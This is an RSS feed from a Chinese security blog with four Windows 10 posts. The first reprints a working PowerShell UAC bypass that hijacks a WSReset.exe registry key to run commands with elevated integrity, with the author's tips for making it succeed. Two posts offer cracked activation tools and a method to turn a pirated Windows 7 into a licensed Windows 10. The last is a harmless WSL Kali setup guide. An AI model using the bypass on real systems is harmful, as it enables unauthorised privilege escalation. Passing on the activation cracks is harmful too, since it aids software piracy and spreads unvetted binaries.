<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>win10 &#8211; ChaBug安全</title>
	<atom:link href="/tags/win10/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Sat, 09 May 2020 08:00:14 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>Win10利用应用商店WSReset.exe进行bypassuac</title>
		<link>/tools/1714.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sat, 09 May 2020 07:11:32 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[uac]]></category>
		<category><![CDATA[win10]]></category>
		<category><![CDATA[内网]]></category>
		<category><![CDATA[渗透]]></category>
		<guid isPermaLink="false">/?p=1714</guid>

					<description><![CDATA[遇到了win10的环境就找了下bypassuac的。 环境 win10 1909 18363.535 Pro 复现 利用微软提供的sigcheck.exe签名检查工具发现 C:\W...]]></description>
										<content:encoded><![CDATA[<p>遇到了<span class="wpcom_tag_link"><a href="/tags/win10" title="win10" target="_blank">win10</a></span>的环境就找了下<span class="wpcom_tag_link"><a href="/tags/bypass" title="bypass" target="_blank">bypass</a></span><span class="wpcom_tag_link"><a href="/tags/uac" title="uac" target="_blank">uac</a></span>的。</p>
<h2>环境</h2>
<p>win10 1909 18363.535 Pro</p>
<h2>复现</h2>
<p>利用微软提供的<a class="wp-editor-md-post-content-link" href="https://docs.microsoft.com/en-us/sysinternals/downloads/sigcheck">sigcheck.exe</a>签名检查工具发现 <code>C:\Windows\System32\WSReset.exe</code> 存在<code>autoElevate</code>属性为<code>true</code></p>
<p><img src="https://y4er.com/img/uploads/20200509104541.png" alt="image.png" /></p>
<p>使用Procmon64.exe添加过滤条件</p>
<p><img src="https://y4er.com/img/uploads/20200509108734.png" alt="image.png" /></p>
<p>没找到 <code>HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command</code></p>
<p>根据<a class="wp-editor-md-post-content-link" href="https://docs.microsoft.com/en-us/windows/win32/sysinfo/hkey-classes-root-key">微软文档</a>可知用户特定的设置优先于默认设置，而当前用户可以写入这个值，那么可以使用powershell来实现poc。</p>
<pre><code class="language-powershell line-numbers">&lt;#
.SYNOPSIS
Fileless UAC Bypass by Abusing Shell API

Author: Hashim Jawad of ACTIVELabs

.PARAMETER Command
Specifies the command you would like to run in high integrity context.

.EXAMPLE
Invoke-WSResetBypass -Command "C:\Windows\System32\cmd.exe /c start cmd.exe"

This will effectivly start cmd.exe in high integrity context.

.NOTES
This UAC bypass has been tested on the following:
 - Windows 10 Version 1803 OS Build 17134.590
 - Windows 10 Version 1809 OS Build 17763.316
#&gt;

function Invoke-WSResetBypass {
      Param (
      [String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe"
      )

      $CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      $filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      New-Item $CommandPath -Force | Out-Null
      New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null
      Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null
      Write-Host "[+] Registry entry has been created successfully!"

      $Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
      Write-Host "[+] Starting WSReset.exe"

      Write-Host "[+] Triggering payload.."
      Start-Sleep -Seconds 5

      if (Test-Path $filePath) {
      Remove-Item $filePath -Recurse -Force
      Write-Host "[+] Cleaning up registry entry"
      }
}
</code></pre>
<p>在我自己测试的过程中因为WSReset.exe启动过慢的情况出现了多次复现不成功，建议把powershell脚本去掉后面的清空注册表，避免WSReset运行时找不到注册表，不过记得手动清除。</p>
<p><img src="https://y4er.com/img/uploads/20200509105277.png" alt="image.png" /></p>
<h2>参考</h2>
<ol>
<li>https://www.activecyber.us/activelabs/windows-uac-bypass</li>
<li>https://github.com/sailay1996/UAC_Bypass_In_The_Wild</li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>win10各版本数字权力激活工具</title>
		<link>/tools/424.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Tue, 29 May 2018 07:53:59 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[win10]]></category>
		<category><![CDATA[激活]]></category>
		<guid isPermaLink="false">/?p=338</guid>

					<description><![CDATA[出自远景论坛 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; 校验信息 &#8212;&#8212;...]]></description>
										<content:encoded><![CDATA[<p><img loading="lazy" class="alignnone size-medium" src="https://ws1.sinaimg.cn/mw690/7efa749fly1fm1lp9sqrbj21hc0u0js7.jpg" width="690" height="388" /></p>
<p>出自远景论坛</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; 校验信息 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>名称: HWIDGen_CN.exe</p>
<p>SHA1: DC0082F4458106A4FEBC21CADD42B0E7E46FAFAF</p>
<p>SHA256: 8504D3568E93B0C4A026E7AAB43CC0751AD50A01A51E4AEEC951C60E37E5F6B5</p>
<p>查毒报告： <a href="https://www.virustotal.com/#/file/8504d3568e93b0c4a026e7aab43cc0751ad50a01a51e4aeec951c60e37e5f6b5/detection">https://www.virustotal.com/#/file/8504d3568e93b0c4a026e7aab43cc0751ad50a01a51e4aeec951c60e37e5f6b5/detection</a></p>
<p>&nbsp;</p>
<p>链接:<a href="https://pan.baidu.com/s/1xoJMnUBcCvDN6_WValh3Qg">https://pan.baidu.com/s/1xoJMnUBcCvDN6_WValh3Qg</a><br />
密码:2bay</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Windows激活之路：盗版Windows 7 升级到 Windows 10专业版</title>
		<link>/tools/408.html</link>
					<comments>/tools/408.html#comments</comments>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Tue, 01 May 2018 10:39:06 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[win10]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[激活]]></category>
		<guid isPermaLink="false">/?p=348</guid>

					<description><![CDATA[微软提供给盗版Win7 洗白成 Win 10正版系统的方法。不过目前这个活动已经结束了！！ 虽然活动结束了，但是有大佬发出了一个强行上车的路子！有需要的可以关注一下！！！ 工具下载...]]></description>
										<content:encoded><![CDATA[<p>微软提供给盗版Win7 洗白成 Win 10正版系统的方法。不过目前这个活动已经结束了！！</p>
<p>虽然活动结束了，但是有大佬发出了一个强行上车的路子！有需要的可以关注一下！！！</p>
<h3>工具下载</h3>
<p>链接: <a href="https://pan.baidu.com/s/1Km2e3T98AFXDCBXQ_gmCRA">https://pan.baidu.com/s/1Km2e3T98AFXDCBXQ_gmCRA</a> 密码: svy7</p>
<h2><img src="https://ws1.sinaimg.cn/mw690/7efa749fly1fquzvhczrrj20hq06h0sv.jpg" alt="" title=""></h2>
<h3>操作步骤</h3>
<ol>
<li>首先你得是Win7的系统，通过黑科技<span class="wpcom_tag_link"><a href="/tags/%e6%bf%80%e6%b4%bb" title="激活" target="_blank">激活</a></span>的也可以升级！</li>
<li>下载工具（见工具下载），然后把它们解压到桌面上。</li>
<li>随后打开cmd命令提示符，先输入 <code>cd desktop</code> 并按回车键执行它。</li>
<li>然后输入 <code>MediaCreationTool.exe /Selfhost</code> 同样按回车键执行，咱们就可以瞬间收到Win10 17134 RTM更新！</li>
</ol>
<p><img src="https://ws1.sinaimg.cn/mw690/7efa749fly1fqv06h9prnj20rk0dmt9o.jpg" alt="" title=""></p>
]]></content:encoded>
					
					<wfw:commentRss>/tools/408.html/feed</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>win10安装Kali Linux子系统和桌面环境</title>
		<link>/tools/373.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 07 Mar 2018 17:30:00 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[win10]]></category>
		<category><![CDATA[子系统]]></category>
		<guid isPermaLink="false">/?p=277</guid>

					<description><![CDATA[官方资讯 https://www.kali.org/news/kali-linux-in-the-windows-app-store/ 在过去的几周里，我们一直在与微软WSL团队合...]]></description>
										<content:encoded><![CDATA[<blockquote><p>官方资讯 <a href="https://www.kali.org/news/kali-linux-in-the-windows-app-store/">https://www.kali.org/news/kali-linux-in-the-windows-app-store/</a></p></blockquote>
<p><img src="https://www.kali.org/wp-content/uploads/2017/11/kali-release-600x284.png" alt="" title=""></p>
<blockquote><p>在过去的几周里，我们一直在与微软WSL团队合作，将Kali <span class="wpcom_tag_link"><a href="/tags/linux" title="Linux" target="_blank">Linux</a></span>作为官方WSL发行版引入Microsoft App Store，今天我们很高兴地宣布推出“Kali Linux”Windows应用程序。对于Windows 10用户，这意味着您可以简单地启用WSL，在Windows存储中搜索Kali，并通过单击进行安装。对于渗透测试人员和安全专业人士来说，这是一个令人兴奋的消息，因为企业合规性标准导致工具集有限。</p></blockquote>
<p>虽然在Windows上运行Kali有一些本地运行（例如缺乏原始套接字支持）的缺点，但它带来了一些非常有趣的可能性，例如扩展您的安全工具包以包括一大堆命令行工具目前在卡利。我们将更新我们的博客，并发布更多有关此应用程序发展的新闻和更新。</p>
<h1>在WSL上安装Kali Linux</h1>
<p>以下是设置和安装过程的简要说明。</p>
<ol>
<li>
<p>更新您的Windows 10机器。打开一个管理PowerShell窗口并使用这一行代码安装Windows<span class="wpcom_tag_link"><a href="/tags/%e5%ad%90%e7%b3%bb%e7%bb%9f" title="子系统" target="_blank">子系统</a></span>。完成后需要重新启动。</p>
<pre><code>Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux</code></pre>
</li>
<li>重新启动后，打开Windows App商店并搜索“Kali Linux”应用程序，或者点击此处直接进入。安装应用程序并享受卡莉！</li>
</ol>
<h1>升级Kali</h1>
<pre><code>apt-get update
apt-get dist-upgrade</code></pre>
<h1>桌面环境</h1>
<p>安装wget之后运行</p>
<pre><code>wget https://kali.sh/xfce4.sh
sudo ./xfce4.sh
sudo /etc/init.d/xrdp start</code></pre>
<p>然后远程链接127.0.0.1:3390即可进入kali的桌面环境</p>
<h1>tips</h1>
<ol>
<li>未集成工具</li>
<li>一些工具可能不能正常运行</li>
</ol>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
